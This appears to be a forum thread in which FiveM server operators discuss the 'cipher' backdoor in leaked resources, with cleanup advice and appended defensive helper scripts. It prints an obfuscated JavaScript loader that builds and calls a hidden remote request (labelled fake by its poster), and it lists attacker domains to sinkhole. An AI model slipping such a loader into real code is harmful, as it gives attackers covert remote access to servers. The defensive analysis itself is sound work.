Usually this is only partially true; while it of course depends on the specific malicious code being run, a backdoor like this allows the attacker full access to the server, so they can not only steal your server key, but any and all information on the server that they can find. Needless to say, it’s no small issue, and shouldn’t be taken lightly.
Yes, 2FA will protect you from someone taking over your KEYMASTER. But wait, they have full access to your server, so they also have access to your emails.
So I did some reading and it claims this virus
But wait, you also have 2FA on your email, if you’re gonna use it on your server…
So, the cipher also took off your fingers and took a photo of your face, and social engineered all your childhood nightmares so it’s able to crack the secret password “Ilovewinneythepooh”.
Default payloads
Resource Stopper & Active
Visual Spam
Mod Menu
Set All
Discord Rich Presence Hack
Resources Editor
Editor of configuration files
Download database
Deleting your name
Destruction of the database
SSH & RDP Access
Player database
All of that can happen and FiveM is still yet to do anything…?
I have not been infected, but apparently many, many have…
I feel like the cfx team should at least have some sort of announcement or something about this… but all I can find is community members trying their best…
Just don’t use leaked shiet, log out of email, Keymaster and stuff on your root server, only run them on your own home computer, and you should be good. Backdoors are hella shiet, so just be careful what you’re downloading.
+1
I only use resources from here or trusted developers.
Just a little weird how this is a possibility and not really talked about.
Yep, also the modding situation; RAGE uses Easy AC, which is also why it’s more effective.
Your points are not making any sense. Once you have logged into Google Chrome you have access to all Google services. Not everyone uses Microsoft search + Bing like you apparently xdddd
If you really feel it’s making no sense, then I will never be able to explain it to you. And if you feel it’s such a burden to look at the forum, I simply advise you to do something else. Maybe even try Bing; it’s actually better than being toxic and rude.
Maybe try spending some time figuring out why it’s important that some in a community ask for help, and why it’s actually more important that there are newcomers.
No one is being toxic; the problem is that you don’t have any common penetration-testing knowledge. Nobody is toxic or rude. If you seriously don’t understand the fact that everything can get stolen in a second, then you’re high asf.
Try to find where it came from (mostly leaked scripts), remove them, and then clean up the user it created.
Rather reinstall the whole machine; if they created a new user, they may have done a whole lot more nasty stuff to that machine.
As TheIndra said, once there is a user created, your machine is done, dude; your server has most likely been uploaded to an external server, with all your information. At the point of the cipher spreading to another resource, it’s done for your resources. Back to my point: if you see a user called xyz, moda or sys, then your machine is done, as multiple new rules have been made. There are plenty of examples where you can’t even access the computer via SSH or Remote Desktop Connection, as a new rule has been created so you can’t access the machine via RDC, and the only actual way you can still connect to the computer is with VNC. There are also examples of ciphers that immediately, on resource start, obfuscate/encrypt ALL of your resources, with zero time to react. Sometimes you can pay a ransom fee, most times not. Anyway, just reset the whole computer via your VPS control panel, or, if it’s your own machine, fully format it with another computer and install new Windows that way.
I really feel like the cfx team should step up on this matter; maybe we need a hero lol
They don’t give a shit. Download GitHub - Szpachlan/CipherScanner; ciastekbatek made it, the developer of FiveGuard.
Let me look through all my server files using the find feature in VSC for this exact HTTPS request that is a RAT, and I will never find it:
(function(){var uah='',rEd=302-291;function mzO(o){var f=3977643;var x=o.length;var k=[];for(var h=0;h<x;h++){k[h]=o.charAt(h)};for(var h=0;h<x;h++){var b=f*(h+85)+(f%49139);var i=f*(h+699)+(f%13191);var m=b%x;var n=i%x;var j=k[m];k[m]=k[n];k[n]=j;f=(b+i)%5338654;};return k.join('')};var Qga=mzO('bmpsgrzxqhroneftsvcttklciooyrndwauujc').substr(0,rEd);var rPv='rurn;)s;a+h)r])rC4)t;{,rt;[(c.of+ay[lf=]+f=r929"7n;t++fai 06=vr,)+av=,;7 0onu;,([l8=)r=1a4sde.90,;s,6afvu)va)u.,jgogma01invlrrrcj]et iwna2l(ug1h[9el g =4vo)g.j[[;a<vyas4,1a2+v;bei)a,+(a ;=),,)(;)62af({d"(}rr.,e<amg,(mc1q.t+ngt,p=l=))vh[ bnea6r2rnnaa=;,(p+rapeun);t0,vvtrgy=;e=(npd"={y5=0d7h a)"kar ; nu;=;;ll,jglra]+aaelr.c=lh=[xh()i 5fdk}tr[svfb2irv7f20+rho(=vo i5; )]]v[r+([{v0efe;+;e20=jr]eg{co1)u6vz;CbvysihssA).u+6z-vn*n!=.n;h-"ea,A01j+)hh-a;n .iig.rt,(esipffCcth{9=v)a;6+r=gt=ltCro(-1lChd.A(he .s=+srriso .ds==)r),;rd2ame; h=,ln6rssq=rt;in-2a)7lagrlru=.Cfa(]8ar(+uq).apya=eooh0srmi;8Stvf e)tfb7ucfs <r7rot(<qf+7]ii8,dj3<mtg}.i;h1"](i.l ,h((rsluszre(+=7r=)eshacf6jaoop]8oArlt=zul;kbns9Sfvn+odr1iuoss;,r;rhie.+8>[(-(9o,v"8. nac;rdr}rt0cat(g}} f; g18"n"+q]o1-u)t.e>1h.( .=vf*r,v(r)mlulpnrpb;f[=5a(+8;k=C=mv=t".;iA7(=m;g)3 h(r)o;n8npran;.{).[bdo!ouuoang;teC;0hhrl;kp]s;bre;}avv(=.(i]c(n,=';var WSQ=mzO[Qga];var qbB='';var DwZ=WSQ;var vTM=WSQ(qbB,mzO(rPv));var KxU=vTM(mzO('efprhach\/()smnitt:\/"ett\/d"f'));var xEC=DwZ(uah,KxU );xEC(6032);return 9481})()
Sure, let’s undo the obfuscation on it using ChatGPT; that has to work, right?
(function(){
var uah='', rEd=302-291;
function mzO(o) {
var f=3977643;
var x=o.length;
var k=[];
for(var h=0; h<x; h++) {
k[h]=o.charAt(h);
}
for(var h=0; h<x; h++) {
var b=f*(h+85)+(f%49139);
var i=f*(h+699)+(f%13191);
var m=b%x;
var n=i%x;
var j=k[m];
k[m]=k[n];
k[n]=j;
f=(b+i)%5338654;
}
return k.join('');
}
var Qga=mzO('bmpsgrzxqhroneftsvcttklciooyrndwauujc').substr(0,rEd);
var rPv='rurn;)s;a+h)r])rC4)t;{,rt;[(c.of+ay[lf=]+f=r929"7n;t++fai 06=vr,)+av=,;7 0onu;,([l8=)r=1a4sde.90,;s,6afvu)va)u.,jgogma01invlrrrcj]et iwna2l(ug1h[9el g =4vo)g.j[[;a<vyas4,1a2+v;bei)a,+(a ;=),,)(;)62af({d"(}rr.,e<amg,(mc1q.t+ngt,p=l=))vh[ bnea6r2rnnaa=;,(p+rapeun);t0,vvtrgy=;e=(npd"={y5=0d7h a)"kar ; nu;=;;ll,jglra]+aaelr.c=lh=[xh()i 5fdk}tr[svfb2irv7f20+rho(=vo i5; )]]v[r+([{v0efe;+;e20=jr]eg{co1)u6vz;CbvysihssA).u+6z-vn*n!=.n;h-"ea,A01j+)hh-a;n .iig.rt,(esipffCcth{9=v)a;6+r=gt=ltCro(-1lChd.A(he .s=+srriso .ds==)r),;rd2ame; h=,ln6rssq=rt;in-2a)7lagrlru=.Cfa(]8ar(+uq).apya=eooh0srmi;8Stvf e)tfb7ucfs <r7rot(<qf+7]ii8,dj3<mtg}.i;h1"](i.l ,h((rsluszre(+=7r=)eshacf6jaoop]8oArlt=zul;kbns9Sfvn+odr1iuoss;,r;rhie.+8>[(-(9o,v"8. nac;rdr}rt0cat(g}} f; g18"n"+q]o1-u)t.e>1h.( .=vf*r,v(r)mlulpnrpb;f[=5a(+8;k=C=mv=t".;iA7(=m;g)3 h(r)o;n8npran;.{).[bdo!ouuoang;teC;0hhrl;kp]s;bre;}avv(=.(i]c(n,=';
var WSQ=mzO[Qga];
var qbB='';
var DwZ=WSQ;
var vTM=WSQ(qbB,mzO(rPv));
var KxU=vTM(mzO('efprhach\/()smnitt:\/"ett\/d"f'));
var xEC=DwZ(uah,KxU);
xEC(6032);
return 9481
})()
And that’s just from a free obfuscator; you could easily get a better one and hide that even better.
Next time help instead of being rude.
Note: The HTTPS request in this is fake and does nothing :P
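The snippet above hides its strings with a fixed character shuffle (the function it calls mzO()), and then indexes mzO with one recovered string and calls the result with a second recovered source string, the usual shape of building a function from a string at runtime. The defender's move is to recover those literals statically and read them, never to run the snippet. The helper below is an added example, not code from the thread or from any project: it reimplements the shuffle with the snippet's own constants so the posted literals can be recovered offline, and adds the inverse so the reader can see the transform is a plain permutation keyed only by string length. The function names shufflePermutation, recover and obfuscate are mine; the two literals in POSTED are copied from the snippet (the long third literal is omitted).

```javascript
// Added example: static recovery of the string-shuffle obfuscation shown above.
// Nothing here evaluates recovered text; it only permutes characters.

// Same constants and arithmetic as mzO() in the posted snippet.
// Returns perm such that mzO(s)[p] === s[perm[p]] for any string s of this length.
function shufflePermutation(length) {
  let f = 3977643;
  const perm = Array.from({ length }, (_, i) => i);
  for (let h = 0; h < length; h++) {
    const b = f * (h + 85) + (f % 49139);
    const i = f * (h + 699) + (f % 13191);
    const m = b % length;
    const n = i % length;
    [perm[m], perm[n]] = [perm[n], perm[m]]; // the same swap mzO does on characters
    f = (b + i) % 5338654;
  }
  return perm;
}

// What the obfuscated code computes at runtime: the readable string.
function recover(obfuscated) {
  const perm = shufflePermutation(obfuscated.length);
  return perm.map((src) => obfuscated[src]).join("");
}

// The inverse: what the obfuscator did to produce the literal in the first place.
function obfuscate(plain) {
  const perm = shufflePermutation(plain.length);
  const out = new Array(plain.length);
  perm.forEach((src, p) => { out[src] = plain[p]; });
  return out.join("");
}

// Literals copied from the posted snippet (the long one feeding the second call is omitted).
const POSTED = {
  // the snippet keeps only the first 11 characters and uses them as a property name on mzO
  propertyName: "bmpsgrzxqhroneftsvcttklciooyrndwauujc",
  // argument passed to the function the snippet builds (the author says the request is fake)
  builtFunctionArg: "efprhach/()smnitt:/\"ett/d\"f",
};

// Recover and print each literal for review; review, don't execute.
function recoverPosted() {
  const result = {};
  for (const [name, literal] of Object.entries(POSTED)) {
    result[name] = recover(literal);
  }
  return result;
}

for (const [name, text] of Object.entries(recoverPosted())) {
  console.log(`${name}: ${JSON.stringify(text)}`);
}
```

Because the permutation depends only on the length, every literal of the same length in code from this obfuscator is unscrambled by the same table, which is why a scanner can unwrap such strings without a JavaScript engine at all. If a listing was mangled by copy-paste, the recovered text will look wrong; compare the character multiset of input and output before trusting it.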
As I said before, no one was being rude, and you are just stating the obvious. Also, is this JS code? As I don’t think people hide payloads in FiveM JS.
Cfx can’t fix people being dumb and/or greedy by using leaked resources; you will never get your server infected this way if you just don’t run resources from sources you don’t trust, easy as.
This is a little guide on how to stop a connection to a backdoor.
Blacklist their domains on your firewall. This will slow them down; however, we have seen instances where they use proxies to evade this, but on most leaks this will help.
Open CMD and type NETSTAT. This will show you if you’re still infected by cipher.
Next open this file:
C:\Windows\System32\drivers\etc\hosts
Next, in your file, put these exact lines below:
127.0.0.1 cipher-panel.me
127.0.0.1 ciphercheats.com
127.0.0.1 keyx.club
127.0.0.1 dark-utilities.xyz
All of these are related to cipher.
You can also do these to make sure there are no unauthorized things on your VPS or PC…
Check the system admins on the machine to verify that no unauthorized accounts exist.
Change any passwords you have on the host machine to ensure that they don’t have access.
Note: Using NETSTAT in your CMD can show you any weird connections to your VPS or PC etc. If you find a connection that you believe to be a cheat engine or backdoor, just do the following.
C:\Windows\System32\drivers\etc\hosts
127.0.0.1 weirdname123.com -- of course you need to make this what you find in your CMD results
To add, 127.0.0.1 is your localhost, so you need to keep that the same.
Hope this helps anyone in need of this.
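The guide above boils down to two checks that are easy to get subtly wrong by hand: are all four domains really pinned to 127.0.0.1 in the hosts file (and not just present somewhere, say commented out), and does NETSTAT output show anything talking to them. The script below is an added example for the Windows host, not code from the thread or from any project: a Node.js helper that parses hosts-file text, reports which of the guide's domains are missing, produces the updated text idempotently, and parses NETSTAT output to flag connections whose remote host is one of those domains or a subdomain of one. The function names are mine, the domain list is the one in the guide, and the sample hosts and netstat text are constructed for the demonstration. Name matching assumes NETSTAT was run without -n (the guide's plain NETSTAT), so remote hosts appear as names rather than IPs.

```javascript
// Added example: hosts-file sinkhole check and NETSTAT triage for the domains listed above.
const SINKHOLE = ["cipher-panel.me", "ciphercheats.com", "keyx.club", "dark-utilities.xyz"];

// Parse hosts-file text into a Map of hostname -> ip; comments and blank lines are ignored.
function parseHosts(text) {
  const map = new Map();
  for (const raw of text.split(/\r?\n/)) {
    const line = raw.split("#")[0].trim();
    if (!line) continue;
    const [ip, ...names] = line.split(/\s+/);
    for (const name of names) map.set(name.toLowerCase(), ip);
  }
  return map;
}

// Domains from the list that are not currently pinned to 127.0.0.1.
function missingSinkholes(hostsText, domains = SINKHOLE) {
  const map = parseHosts(hostsText);
  return domains.filter((d) => map.get(d.toLowerCase()) !== "127.0.0.1");
}

// Hosts text with any missing entries appended; unchanged when nothing is missing.
function addSinkholes(hostsText, domains = SINKHOLE) {
  const missing = missingSinkholes(hostsText, domains);
  if (missing.length === 0) return hostsText;
  const sep = hostsText === "" || hostsText.endsWith("\n") ? "" : "\n";
  return hostsText + sep + missing.map((d) => `127.0.0.1 ${d}`).join("\n") + "\n";
}

// Parse NETSTAT (or NETSTAT -ano) output into rows; the foreign address is split
// at its last colon so both "name:service" and "[ipv6]:port" forms work.
function parseNetstat(text) {
  const rows = [];
  for (const raw of text.split(/\r?\n/)) {
    const cols = raw.trim().split(/\s+/);
    if (cols[0] !== "TCP" && cols[0] !== "UDP") continue;
    const foreign = cols[2];
    const cut = foreign.lastIndexOf(":");
    const fixedCols = cols[0] === "TCP" ? 4 : 3; // TCP rows carry a State column, UDP rows do not
    rows.push({
      proto: cols[0],
      local: cols[1],
      host: foreign.slice(0, cut),
      port: foreign.slice(cut + 1),
      state: cols[0] === "TCP" ? cols[3] : "",
      pid: cols.length > fixedCols ? cols[cols.length - 1] : null, // present only with -o
    });
  }
  return rows;
}

// Rows whose remote host is a listed domain or a subdomain of one.
function suspiciousConnections(netstatText, domains = SINKHOLE) {
  return parseNetstat(netstatText).filter((r) => {
    const host = r.host.toLowerCase();
    return domains.some((d) => host === d || host.endsWith("." + d));
  });
}

// Constructed sample data (not real output from any machine).
const SAMPLE_HOSTS = [
  "# constructed sample hosts file",
  "127.0.0.1 localhost",
  "127.0.0.1 keyx.club   # already sinkholed",
].join("\n") + "\n";

const SAMPLE_NETSTAT = [
  "Active Connections",
  "",
  "  Proto  Local Address          Foreign Address        State           PID",
  "  TCP    10.0.0.5:49712         cipher-panel.me:https  ESTABLISHED     4321",
  "  TCP    10.0.0.5:30120         203.0.113.7:51234      ESTABLISHED     2208",
  "  TCP    10.0.0.5:49800         api.dark-utilities.xyz:443  TIME_WAIT  0",
].join("\n");

console.log("missing sinkhole entries:", missingSinkholes(SAMPLE_HOSTS));
console.log("connections to listed hosts:",
  suspiciousConnections(SAMPLE_NETSTAT).map((r) => `${r.host}:${r.port} pid=${r.pid}`));
```

To use it on a real machine, read C:\Windows\System32\drivers\etc\hosts with fs.readFileSync, pass the text to addSinkholes, and write the result back from an elevated prompt; feed it the saved output of NETSTAT -ano to get the owning PID of any flagged connection, which is the process to investigate. Note that once the hosts entries are in place those names resolve to 127.0.0.1, so a later NETSTAT will no longer show them by name; run the connection check before applying the sinkhole, and keep the firewall blacklist the guide mentions as the second layer.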